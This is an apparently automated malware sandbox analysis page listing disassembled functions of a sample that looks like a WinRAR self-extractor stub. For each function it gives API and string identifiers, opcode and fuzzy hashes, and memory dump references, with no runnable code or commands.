                                                                                    • Instruction ID: 38b565c8089364ac16b031cefc6b5aa0a5bdc5d5fa8f0b03ee15eb6e4de543d6
                                                                                    • Opcode Fuzzy Hash: 5316538c3acc0073b16b98db0c7bd9415f0c0fe39fbd25c30d7f25bf7cf9e4bf
                                                                                    • Instruction Fuzzy Hash: DCB2C572E2D68649E910FB69D4411BDE311EFAB391F905332FB9D126DEDE2CE1428318
                                                                                    Function 00007FF7B8F31470 Relevance: 22.3, APIs: 8, Strings: 4, Instructions: 1310COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfomemcpy_s
                                                                                    • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                    • API String ID: 1759834784-2761157908
                                                                                    • Opcode ID: 1fe47b1aec351fa043eaf3a5e7ad516f2e87038633cfd29dc14ace316408076f
                                                                                    • Instruction ID: 7cad2531b415b2e01e8f0484d4cafac6d6912d00d049a273b39a32cffcd82252
                                                                                    • Opcode Fuzzy Hash: 1fe47b1aec351fa043eaf3a5e7ad516f2e87038633cfd29dc14ace316408076f
                                                                                    • Instruction Fuzzy Hash: 93B23A72A081828FE724AE2DD4406FDF7A1FB6538AF905135DB0957B8CDF38E5468B18
                                                                                    Function 00007FF7B8F00E54 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 375fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: NamePath$File_invalid_parameter_noinfo_noreturn$LongMoveShort$CompareCreateString
                                                                                    • String ID: rtmp
                                                                                    • API String ID: 3587137053-870060881
                                                                                    • Opcode ID: 0847ed9eff23d33de2e74f92e606af158c774808165bee8ae21c639d5494988b
                                                                                    • Instruction ID: c8f08317134bd84d4b058f82ccdc2fcaab13f720ca7b0f8e7ab34fd04dbd4f8e
                                                                                    • Opcode Fuzzy Hash: 0847ed9eff23d33de2e74f92e606af158c774808165bee8ae21c639d5494988b
                                                                                    • Instruction Fuzzy Hash: 10F1D322A18A8189FB10EF69D4401FDE761EBA6785F901132EB5D57AADDF3CD482C318
                                                                                    Function 00007FF7B8F19D04 Relevance: 17.8, APIs: 8, Strings: 2, Instructions: 270COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn$Dialog$Concurrency::cancel_current_taskItemText
                                                                                    • String ID: GETPASSWORD1$Software\WinRAR SFX
                                                                                    • API String ID: 2526813639-1315819833
                                                                                    • Opcode ID: 2051dd7c758e963753f9469ead7e967a51fc6060eb75ca3640401dc1fa6c7f71
                                                                                    • Instruction ID: 9f0edd16857558638abb4018c74759f365287d433a639394d7c464bf39ea9054
                                                                                    • Opcode Fuzzy Hash: 2051dd7c758e963753f9469ead7e967a51fc6060eb75ca3640401dc1fa6c7f71
                                                                                    • Instruction Fuzzy Hash: B1C1A172F19B8289FA00EB78D4402FDE361AF56795F804231EB1C2669EDE3CE556C358
                                                                                    Function 00007FF7B8F04EE4 Relevance: 12.2, APIs: 8, Instructions: 239COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: FullNamePath_invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 1693479884-0
                                                                                    • Opcode ID: 751eae7882fd2ae6ed810a8c9f73cde5ed80f6331f5f4d072062b8c6cf71b97d
                                                                                    • Instruction ID: 0599ab0f946094e1fb03234d0b680c3e80d21ffeabf3fbfe66203b50877a8304
                                                                                    • Opcode Fuzzy Hash: 751eae7882fd2ae6ed810a8c9f73cde5ed80f6331f5f4d072062b8c6cf71b97d
                                                                                    • Instruction Fuzzy Hash: E691B262F157524CFE00AF7D94444BCE361ABAA796F905235DF2D27BC9DE7CD0828218
                                                                                    Function 00007FF7B8F1805C Relevance: 10.9, APIs: 5, Strings: 1, Instructions: 429COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-3916222277
                                                                                    • Opcode ID: 3b2420ec2999c3952802b7dc3a5c5f855c7cc974ed7ed1d83d392f437b16c5d1
                                                                                    • Instruction ID: 146f2fd5aa11bfa0bca4da459e99e291e35ef2c473f22283c16421e5c0c63c32
                                                                                    • Opcode Fuzzy Hash: 3b2420ec2999c3952802b7dc3a5c5f855c7cc974ed7ed1d83d392f437b16c5d1
                                                                                    • Instruction Fuzzy Hash: 90020472F19B4648EA10FB68D1401BCE361AB66B98FD04231DB6D137C9EF3CE4928358
                                                                                    Function 00007FF7B8F22B90 Relevance: 10.6, APIs: 7, Instructions: 71COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 3140674995-0
                                                                                    • Opcode ID: a27f29379735b8fcd6b3f39ca141da795c7e4fd96fe0e5bb631bb0219032f145
                                                                                    • Instruction ID: 7cd11322bd39a0ce0b9c90ba4295f52164611862f982490aacb440540d0400ca
                                                                                    • Opcode Fuzzy Hash: a27f29379735b8fcd6b3f39ca141da795c7e4fd96fe0e5bb631bb0219032f145
                                                                                    • Instruction Fuzzy Hash: 2F314D72618B828AEB60AF64E8503EDA364FB99705F844039DB4D47B98DF3CD5498724
                                                                                    Function 00007FF7B8F26608 Relevance: 9.1, APIs: 6, Instructions: 83COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 1239891234-0
                                                                                    • Opcode ID: 300a948ef2a7a4b9d66705fbdf6716acced11e50c219278d1591a591d875370b
                                                                                    • Instruction ID: cef7cd36d5ecb4d33e40ef2c1672ff92500d97281ba1a242d35a1429a733e64b
                                                                                    • Opcode Fuzzy Hash: 300a948ef2a7a4b9d66705fbdf6716acced11e50c219278d1591a591d875370b
                                                                                    • Instruction Fuzzy Hash: D7319332618B818ADB20DF68E8402AEF3A0FB99755F940135EB8D43B59DF3CD156CB14
                                                                                    Function 00007FF7B8EF1AB4 Relevance: 6.3, APIs: 4, Instructions: 280COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: 584c2e100ccd68e2f8d181b2506f09742892a8bd4e72058849ac1019b05e5006
                                                                                    • Instruction ID: 9879c6776cad119e2211d41f0a0b127ddafb3a49c5f8c7d4c69c15b9345df8a1
                                                                                    • Opcode Fuzzy Hash: 584c2e100ccd68e2f8d181b2506f09742892a8bd4e72058849ac1019b05e5006
                                                                                    • Instruction Fuzzy Hash: C6B1A362A1568996FA11AB69C8402EDE361FBA6794FC05232FB5C03B9DDF3CE541C318
                                                                                    Function 00007FF7B8EFC824 Relevance: 6.3, APIs: 4, Instructions: 254COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: cb8ef6f27dc8f0d948056b18939d1d67dc4071f22827b470aa12568fb2094269
                                                                                    • Instruction ID: 2eb410de4c9be7e490c57b843b8c0f9176c89607734bbe01b2a316dc89ead78c
                                                                                    • Opcode Fuzzy Hash: cb8ef6f27dc8f0d948056b18939d1d67dc4071f22827b470aa12568fb2094269
                                                                                    • Instruction Fuzzy Hash: 76B1C473A1865285FB10EF28D4412EDE361EBA6794FD05231EB5C06AADDF3CE586C318
                                                                                    Function 00007FF7B8F2E9B4 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _invalid_parameter_noinfo.LIBCMT ref: 00007FF7B8F2E9E4
                                                                                      • Part of subcall function 00007FF7B8F26864: GetCurrentProcess.KERNEL32(00007FF7B8F2FBED), ref: 00007FF7B8F26891
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentProcess_invalid_parameter_noinfo
                                                                                    • String ID: *?$.
                                                                                    • API String ID: 2518042432-3972193922
                                                                                    • Opcode ID: 6c48adfc9562f552bab25e0627fbeed4785c1a74431500d895d15752767426cb
                                                                                    • Instruction ID: 09273921827a444ee2214608fdc97ffbbbff77e1e5f3c9decff274e0718f4f0c
                                                                                    • Opcode Fuzzy Hash: 6c48adfc9562f552bab25e0627fbeed4785c1a74431500d895d15752767426cb
                                                                                    • Instruction Fuzzy Hash: 8F51F432B1479589EB10EFA998100BCE7A6FB65BD5F944532EF0D17B8ADE3CD0428324
                                                                                    Function 00007FF7B8EF2C5C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50pipeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: Create$EventNamedPipe
                                                                                    • String ID: \\.\pipe\
                                                                                    • API String ID: 412621846-91387939
                                                                                    • Opcode ID: f3eebe51544f6fc9de6de0bc7f5d8c2c79a1f417ad19e936a21bebe7d5b8b42f
                                                                                    • Instruction ID: 59f6d0c388c62daf36c2133bae0652a48e4e48273795cb2dbb6fe75d472253c3
                                                                                    • Opcode Fuzzy Hash: f3eebe51544f6fc9de6de0bc7f5d8c2c79a1f417ad19e936a21bebe7d5b8b42f
                                                                                    • Instruction Fuzzy Hash: 24212872618B4186E710CB28E05036AF760EB957A8F604325EB6C476E9DF3DD082CB04
                                                                                    Function 00007FF7B8F30FA0 Relevance: 4.8, APIs: 3, Instructions: 340COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: memcpy_s
                                                                                    • String ID:
                                                                                    • API String ID: 1502251526-0
                                                                                    • Opcode ID: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                    • Instruction ID: 924051b33a0a1dba40f92dde264272ab103194c7d484b208d9622e42c64c12c3
                                                                                    • Opcode Fuzzy Hash: b531b63a04a12e36dec63d06dc2411054f876835da8b044adf2bb9f605172619
                                                                                    • Instruction Fuzzy Hash: FED1E832B182868BD734DF19E1846AAF791F799785F848134DB4E53B48DB3CE892CB14
                                                                                    Function 00007FF7B8EFAE3C Relevance: 4.5, APIs: 3, Instructions: 29windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ErrorFormatFreeLastLocalMessage
                                                                                    • String ID:
                                                                                    • API String ID: 1365068426-0
                                                                                    • Opcode ID: a587a837c65065e08ac0ceaeee7012d7e9f34c86446267b0222f8841e56504d6
                                                                                    • Instruction ID: 47bdb266888c0bd0627fae4adfdb98e3b57811117562ad2a60539caa38b387ac
                                                                                    • Opcode Fuzzy Hash: a587a837c65065e08ac0ceaeee7012d7e9f34c86446267b0222f8841e56504d6
                                                                                    • Instruction Fuzzy Hash: D5F068B1A2870687F7109B16E45033AE351FBA6785F840034D74D46688CF3CD046CB28
                                                                                    Function 00007FF7B8F2EBC0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID: .
                                                                                    • API String ID: 0-248832578
                                                                                    • Opcode ID: 3f380521dad8b2db632bf635a16a80b6d86197257593cb9804f101d10115f3b6
                                                                                    • Instruction ID: fd0d4fd6c578fec9264ca5a40f7dc802ac2450766372d938e830afe1ec19774c
                                                                                    • Opcode Fuzzy Hash: 3f380521dad8b2db632bf635a16a80b6d86197257593cb9804f101d10115f3b6
                                                                                    • Instruction Fuzzy Hash: 3431ED31B1469149F720AF7AE8047A5EA92AB56BE4F948735FF5C07BCACE3CD5028314
                                                                                    Function 00007FF7B8EFCCE4 Relevance: 3.3, APIs: 2, Instructions: 253COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: _invalid_parameter_noinfo_noreturn
                                                                                    • String ID:
                                                                                    • API String ID: 3668304517-0
                                                                                    • Opcode ID: b80256dae017ff548252c20e77c147fe4ff261aa7f718be6f4ed8094d46cdf1d
                                                                                    • Instruction ID: 56382dcb3e83ca54d5271345fdafc9e7cc70c07e49ef2fde48ff1dad2f73861b
                                                                                    • Opcode Fuzzy Hash: b80256dae017ff548252c20e77c147fe4ff261aa7f718be6f4ed8094d46cdf1d
                                                                                    • Instruction Fuzzy Hash: A9A1BF22E1866685FA10AF29D4401BDE3A1FF66B88FD44132EF4D17699DF3CE492C358
                                                                                    Function 00007FF7B8F34A18 Relevance: 3.2, APIs: 2, Instructions: 227COMMONLIBRARYCODE
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687299599.00007FF7B8F5A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_7ff7b8ef0000_QH67JSdZWl.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExceptionRaise_clrfp
                                                                                    • String ID:
                                                                                    • API String ID: 15204871-0
                                                                                    • Opcode ID: 06da08e6d5049de7199d6231cea64200759d3661902e56fa1b98c04fad8fe4d7
                                                                                    • Instruction ID: 0e0628cc684ad76f5c5c2d76e1b0b656d7065d37110992e4c1a36959e644642e
                                                                                    • Opcode Fuzzy Hash: 06da08e6d5049de7199d6231cea64200759d3661902e56fa1b98c04fad8fe4d7
                                                                                    • Instruction Fuzzy Hash: C7B17C73A00B848FEB15DF2DC446368BBA0F765B89F158921DB5D837A8CB39D452C714
                                                                                    Function 00007FF7B8F18690 Relevance: 3.2, APIs: 2, Instructions: 187COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.1687114972.00007FF7B8EF1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7B8EF0000, based on PE: true
                                                                                    • Associated: 00000000.00000002.1687091879.00007FF7B8EF0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687175413.00007FF7B8F38000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F4B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.1687210218.00007FF7B8F54000.00000004.00000001.01000000.00000003.sdmpDownload File
